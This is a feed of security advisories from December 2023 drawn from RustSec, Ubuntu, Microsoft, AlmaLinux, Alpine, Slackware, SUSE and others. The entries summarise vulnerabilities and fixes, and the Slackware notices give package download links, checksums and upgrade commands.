09.12.2023 12:05:32	rustsec	[RUSTSEC-2023-0073] Infinite decoding loop through specially crafted payload	The Candid library causes a Denial of Service while parsing a specially crafted payload with `empty` data type. For example, if the payload is `record { * ; empty }` and the canister interface expects `record { * }` then the rust candid decoder treats `empty` as an extra field required by the type. The problem with type `empty` is that the candid rust library wrongly categorizes `empty` as a recoverable error when skipping the field and thus causing an infinite decoding loop. Canisters using affected versions of candid are exposed to denial of service by causing the decoding to run indefinitely until the canister traps due to reaching maximum instruction limit per execution round. Repeated exposure to the payload will result in degraded performance of the canister.For asset canister users, `dfx` versions `>= 0.14.4` to `<= 0.15.2-beta.0` ships asset canister with an affected version of candid.### Unaffected - Rust canisters using candid `< 0.9.0` or `>= 0.9.10` - Rust canister interfaces of type other than `record { * }`- Motoko based canisters- dfx (for asset canister) `<= 0.14.3` or `>= 0.15.2`### References- [GitHub Security Advisory (GHSA-7787-p7x6-fq3j)](https://github.com/dfinity/candid/security/advisories/GHSA-7787-p7x6-fq3j)- [dfinity/candid/pull/478](https://github.com/dfinity/candid/pull/478)- [Candid Library Reference](https://internetcomputer.org/docs/current/references/candid-ref)- [Candid Specification](https://github.com/dfinity/candid/blob/master/spec/Candid.md)- [Internet Computer Specification](https://internetcomputer.org/docs/current/references/ic-interface-spec)	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0073
10.12.2023 20:15:07	alpinelinux	[ALPINE:CVE-2023-5868] postgresql15, postgresql12, postgresql14, postgresql16 vulnerability	[From CVE-2023-5868] A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5868
10.12.2023 20:15:07	alpinelinux	[ALPINE:CVE-2023-5869] postgresql15, postgresql14, postgresql12, postgresql16 vulnerability	[From CVE-2023-5869] A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5869
10.12.2023 20:15:07	alpinelinux	[ALPINE:CVE-2023-5870] postgresql14, postgresql12, postgresql16, postgresql15 vulnerability	[From CVE-2023-5870] A flaw was found in PostgreSQL involving the pg_cancel_backend role that signals background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote high privileged user to launch a denial of service (DoS) attack.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5870
12.12.2023 01:25:20	ubuntu	[USN-6548-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6548-1
12.12.2023 01:13:39	ubuntu	[USN-6549-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-1
11.12.2023 20:00:21	ubuntu	[USN-6547-1] Python vulnerability	Python could be made to bypass security measures if it processed amalicious filename.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6547-1
11.12.2023 15:03:46	ubuntu	[USN-6546-1] LibreOffice vulnerabilities	Several security issues were fixed in LibreOffice.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6546-1
11.12.2023 14:32:24	ubuntu	[USN-6545-1] WebKitGTK vulnerabilities	Several security issues were fixed in WebKitGTK.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6545-1
11.12.2023 13:40:02	ubuntu	[USN-6500-2] Squid vulnerabilities	Several security issues were fixed in Squid.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6500-2
11.12.2023 13:18:13	ubuntu	[USN-6544-1] GNU binutils vulnerabilities	Several security issues were fixed in GNU binutils.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6544-1
11.12.2023 02:26:33	ubuntu	[USN-6543-1] GNU Tar vulnerability	tar could be made to crash if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6543-1
11.12.2023 15:16:59	almalinux	[ALSA-2023:7711] apr security update (moderate)	apr security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7711
12.12.2023 22:36:13	ubuntu	[USN-6548-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6548-2
12.12.2023 19:47:24	ubuntu	[USN-6553-1] Pydantic vulnerability	Pydantic could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6553-1
12.12.2023 17:22:20	ubuntu	[USN-6552-1] Netatalk vulnerability	Netatalk could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6552-1
12.12.2023 15:24:07	ubuntu	[USN-6549-2] Linux kernel (GKE) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-2
12.12.2023 15:16:33	ubuntu	[USN-6534-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6534-2
12.12.2023 15:08:30	ubuntu	[USN-6551-1] Ghostscript vulnerability	Ghostscript could be made to crash if it wrote a TIFF file.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6551-1
12.12.2023 14:15:17	ubuntu	[USN-6550-1] PostfixAdmin vulnerabilities	Several security issues were fixed in PostfixAdmin.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6550-1
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36696] Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36696
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36391] Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36391
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36020] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36020
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36009] Microsoft Word Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36009
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36011] Win32k Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36011
12.12.2023 10:00:00	msrc	[MS:CVE-2023-20588] AMD: CVE-2023-20588 AMD Speculative Leaks Security Notice (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-20588
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35625] Azure Machine Learning Compute Instance for SDK Users Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35625
12.12.2023 10:00:00	msrc	[MS:CVE-2023-21740] Windows Media Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-21740
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36019] Microsoft Power Platform Connector Spoofing Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36019
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36010] Microsoft Defender Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36010
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36012] DHCP Server Service Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36012
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36003] XAML Diagnostics Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36003
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36004] Windows DPAPI (Data Protection Application Programming Interface) Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36004
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36005] Windows Telephony Server Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36005
12.12.2023 10:00:00	msrc	[MS:CVE-2023-36006] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36006
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35638] DHCP Server Service Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35638
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35639] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35639
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35641] Internet Connection Sharing (ICS) Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35641
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35642] Internet Connection Sharing (ICS) Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35642
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35643] DHCP Server Service Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35643
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35644] Windows Sysmain Service Elevation of Privilege (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35644
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35628] Windows MSHTML Platform Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35628
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35629] Microsoft USBHUB 3.0 Device Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35629
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35630] Internet Connection Sharing (ICS) Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35630
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35631] Win32k Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35631
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35632] Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35632
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35633] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35633
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35634] Windows Bluetooth Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35634
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35635] Windows Kernel Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35635
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35636] Microsoft Outlook Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35636
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35619] Microsoft Outlook for Mac Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35619
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35621] Microsoft Dynamics 365 Finance and Operations Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35621
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35622] Windows DNS Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35622
12.12.2023 10:00:00	msrc	[MS:CVE-2023-35624] Azure Connected Machine Agent Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35624
12.12.2023 04:15:06	alpinelinux	[ALPINE:CVE-2023-46219] curl vulnerability	[From CVE-2023-46219] When saving HSTS data to an excessively long file name, curl could end upremoving all contents, making subsequent requests using that file unaware ofthe HSTS status they should otherwise use.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46219
12.12.2023 02:00:00	mozilla	[MFSA-2023-53] Timing side-channel in PKCS#1 v1.5 decryption depadding code (moderate)	<i>Although this issue was embargoed until 2023, it was fixed in NSS 3.61 as released on January 22, 2021</i>	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-53
12.12.2023 02:00:00	vmware	[VMSA-2023-0027] VMware Workspace ONE Launcher updates addresses privilege escalation vulnerability. (CVE-2023-34064) (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/VMSA-2023-0027
12.12.2023 09:49:58	almalinux	[ALSA-2023:7715] webkit2gtk3 security update (important)	webkit2gtk3 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7715
12.12.2023 09:53:08	almalinux	[ALSA-2023:7712] tracker-miners security update (important)	tracker-miners security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7712
14.12.2023 00:08:24	slackware	[SSA:2023-347-01] xorg-server	New xorg-server packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/xorg-server-1.20.14-i586-10_slack15.0.txz: Rebuilt. This update fixes two security issues: Out-of-bounds memory write in XKB button actions. Out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty. For more information, see: https://lists.x.org/archives/xorg/2023-December/061517.html https://www.cve.org/CVERecord?id=CVE-2023-6377 https://www.cve.org/CVERecord?id=CVE-2023-6478 (* Security fix )patches/packages/xorg-server-xephyr-1.20.14-i586-10_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xnest-1.20.14-i586-10_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xvfb-1.20.14-i586-10_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xwayland-21.1.4-i586-9_slack15.0.txz: Rebuilt. This update fixes two security issues: Out-of-bounds memory write in XKB button actions. Out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty. For more information, see: https://lists.x.org/archives/xorg/2023-December/061517.html https://www.cve.org/CVERecord?id=CVE-2023-6377 https://www.cve.org/CVERecord?id=CVE-2023-6478 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-9_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-10_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-9_slack15.0.txzUpdated packages for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.10-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.10-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.10-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.10-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-23.2.3-i586-1.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.10-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.10-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.10-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.10-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-23.2.3-x86_64-1.txzMD5 signaturesSlackware 15.0 packages:5065df8537bef75dc7ffde17aa11f46f xorg-server-1.20.14-i586-10_slack15.0.txz11c84ae8ec6a1d73d61f5ddb96c4067d xorg-server-xephyr-1.20.14-i586-10_slack15.0.txz0b764f40f2e595eacb196b2488e763e9 xorg-server-xnest-1.20.14-i586-10_slack15.0.txz7b9183ff3e37d690656b842271594fe8 xorg-server-xvfb-1.20.14-i586-10_slack15.0.txz8c6c7932e873f338257993f49f927964 xorg-server-xwayland-21.1.4-i586-9_slack15.0.txzSlackware x86_64 15.0 packages:da39c16aaafb5ec7d1a6eee65f8d8907 xorg-server-1.20.14-x86_64-10_slack15.0.txzc580b794181367dc804a933405ef1b6a xorg-server-xephyr-1.20.14-x86_64-10_slack15.0.txzdb09cf6d5b4537841cb853eb4741d32c xorg-server-xnest-1.20.14-x86_64-10_slack15.0.txz84fba92b3df08bf3a439e411809ccde9 xorg-server-xvfb-1.20.14-x86_64-10_slack15.0.txz93f52b3bc807038878c247b0f0d919e3 xorg-server-xwayland-21.1.4-x86_64-9_slack15.0.txzSlackware -current packages:e9650746a65f118b4781e10786a4874b x/xorg-server-21.1.10-i586-1.txzf086a4ddbc545608eefa2714e1a1989b x/xorg-server-xephyr-21.1.10-i586-1.txzb3645e16f3ad489ef967ad12a6ddcfb4 x/xorg-server-xnest-21.1.10-i586-1.txz6fa25c40cf42830cc87745dc05c5452c x/xorg-server-xvfb-21.1.10-i586-1.txzd4835717765da3d0164c2d7e153e35ba x/xorg-server-xwayland-23.2.3-i586-1.txzSlackware x86_64 -current packages:17293df09996e5f8b21c396208e762ef x/xorg-server-21.1.10-x86_64-1.txz33fe37ac542d5a84aca927596dcea037 x/xorg-server-xephyr-21.1.10-x86_64-1.txz651bd878005ed1dd9b97e6459543282d x/xorg-server-xnest-21.1.10-x86_64-1.txz1bffc1de5d6627a1aca85c6dee6ec917 x/xorg-server-xvfb-21.1.10-x86_64-1.txzda4941dc6da69b3a0f7b0467127e6301 x/xorg-server-xwayland-23.2.3-x86_64-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg xorg-server-.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-347-01
13.12.2023 19:41:03	ubuntu	[USN-6555-2] X.Org X Server vulnerabilities	Several security issues were fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6555-2
13.12.2023 16:09:42	ubuntu	[USN-6548-3] Linux kernel (Oracle) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6548-3
13.12.2023 16:01:01	ubuntu	[USN-6549-3] Linux kernel (Low Latency) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-3
13.12.2023 15:55:58	ubuntu	[USN-6534-3] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6534-3
13.12.2023 15:23:48	ubuntu	[USN-6555-1] X.Org X Server vulnerabilities	Several security issues were fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6555-1
13.12.2023 17:03:28	composer	[PHP:IN2CODE-FEMANAGER-2023-50459] TYPO3-EXT-SA-2023-010: Broken Access Control in extension "femanager" (femanager)		https://secdb.nttzen.cloud/security-advisory/detail/PHP:IN2CODE-FEMANAGER-2023-50459
13.12.2023 10:00:00	msrc	[MS:CVE-2023-21751] Azure DevOps Server Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-21751
13.12.2023 04:21:14	ubuntu	[USN-6554-1] GNOME Settings vulnerability	GNOME Settings could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6554-1
13.12.2023 17:03:28	composer	[PHP:DIRECTMAILTEAM-DIRECT-MAIL-2023-50461] TYPO3-EXT-SA-2023-011: Configuration Injection in extension "Direct Mail" (direct_mail)		https://secdb.nttzen.cloud/security-advisory/detail/PHP:DIRECTMAILTEAM-DIRECT-MAIL-2023-50461
13.12.2023 10:00:00	msrc	[MS:CVE-2023-35641] Internet Connection Sharing (ICS) Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35641
14.12.2023 23:21:52	ubuntu	[USN-6488-2] strongSwan vulnerability	strongSwan could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6488-2
14.12.2023 22:13:02	slackware	[SSA:2023-348-01] bluez	New bluez packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/bluez-5.71-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: It may have been possible for an attacker within Bluetooth range to inject keystrokes (and possibly execute commands) while devices were discoverable. Thanks to marav for the heads-up. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-45866 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/bluez-5.71-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/bluez-5.71-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bluez-5.71-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bluez-5.71-x86_64-1.txzMD5 signaturesSlackware 15.0 package:f59a88ade851b78edbadf0ec910d83e1 bluez-5.71-i586-1_slack15.0.txzSlackware x86_64 15.0 package:3ed936ff00a912cd10407733326671ef bluez-5.71-x86_64-1_slack15.0.txzSlackware -current package:6bc0e55e55d4e9c8a41cccf1c1c97232 n/bluez-5.71-i586-1.txzSlackware x86_64 -current package:f31302d1c2ec6774f06cb55ba42a8ea1 n/bluez-5.71-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg bluez-5.71-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-348-01
14.12.2023 19:31:12	ubuntu	[USN-6557-1] Vim vulnerabilities	Several security issues were fixed in Vim.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6557-1
14.12.2023 18:51:18	ubuntu	[USN-6233-2] YAJL vulnerabilities	Several security issues were fixed in YAJL.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6233-2
14.12.2023 18:44:57	ubuntu	[USN-6558-1] audiofile vulnerabilities	Several security issues were fixed in audiofile.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6558-1
14.12.2023 17:56:03	ubuntu	[USN-6556-1] Budgie Extras vulnerabilities	Several security issues were fixed in budgie-extras.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6556-1
14.12.2023 14:33:02	ubuntu	[USN-6546-2] LibreOffice vulnerabilities	Several security issues were fixed in LibreOffice.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6546-2
14.12.2023 10:00:00	msrc	[MS:CVE-2023-6702] Chromium: CVE-2023-6702 Type Confusion in V8		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6702
14.12.2023 10:00:00	msrc	[MS:CVE-2023-6703] Chromium: CVE-2023-6703 Use after free in Blink		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6703
14.12.2023 10:00:00	msrc	[MS:CVE-2023-6704] Chromium: CVE-2023-6704 Use after free in libavif		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6704
14.12.2023 10:00:00	msrc	[MS:CVE-2023-6705] Chromium: CVE-2023-6705 Use after free in WebRTC		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6705
14.12.2023 10:00:00	msrc	[MS:CVE-2023-6706] Chromium: CVE-2023-6706 Use after free in FedCM		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6706
14.12.2023 10:00:00	msrc	[MS:CVE-2023-6707] Chromium: CVE-2023-6707 Use after free in CSS		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6707
14.12.2023 10:00:00	msrc	[MS:CVE-2023-36878] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36878
14.12.2023 13:47:46	almalinux	[ALSA-2023:7784] postgresql security update (important)	postgresql security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7784
14.12.2023 11:39:25	almalinux	[ALSA-2023:7791] gstreamer1-plugins-bad-free security update (important)	gstreamer1-plugins-bad-free security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7791
14.12.2023 11:39:22	almalinux	[ALSA-2023:7732] tracker-miners security update (important)	tracker-miners security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7732
14.12.2023 11:39:26	almalinux	[ALSA-2023:7747] libxml2 security update (moderate)	libxml2 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7747
14.12.2023 11:39:30	almalinux	[ALSA-2023:7754] pixman security update (moderate)	pixman security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7754
14.12.2023 11:39:21	almalinux	[ALSA-2023:7763] runc security update (moderate)	runc security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7763
14.12.2023 11:39:21	almalinux	[ALSA-2023:7766] containernetworking-plugins security update (moderate)	containernetworking-plugins security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7766
14.12.2023 11:39:23	almalinux	[ALSA-2023:7762] skopeo security update (moderate)	skopeo security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7762
14.12.2023 11:39:24	almalinux	[ALSA-2023:7764] buildah security update (moderate)	buildah security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7764
14.12.2023 11:39:38	almalinux	[ALSA-2023:7765] podman security update (moderate)	podman security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7765
14.12.2023 10:49:17	almalinux	[ALSA-2023:7716] webkit2gtk3 security update (important)	webkit2gtk3 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7716
14.12.2023 10:00:00	msrc	[MS:CVE-2023-35618] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35618
14.12.2023 10:00:00	msrc	[MS:CVE-2023-38174] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38174
14.12.2023 10:00:00	msrc	[MS:CVE-2023-36880] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36880
14.12.2023 10:59:00	almalinux	[ALSA-2023:7668] squid:4 security update (important)	squid:4 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7668
15.12.2023 11:13:53	almalinux	[ALSA-2023:7841] gstreamer1-plugins-bad-free security update (important)	gstreamer1-plugins-bad-free security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7841
15.12.2023 11:22:31	almalinux	[ALSA-2023:7836] avahi security update (moderate)	avahi security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7836
15.12.2023 12:41:00	suse	[SUSE-SU-2023:4883-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4883-1
15.12.2023 12:40:45	suse	[SUSE-SU-2023:4882-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4882-1
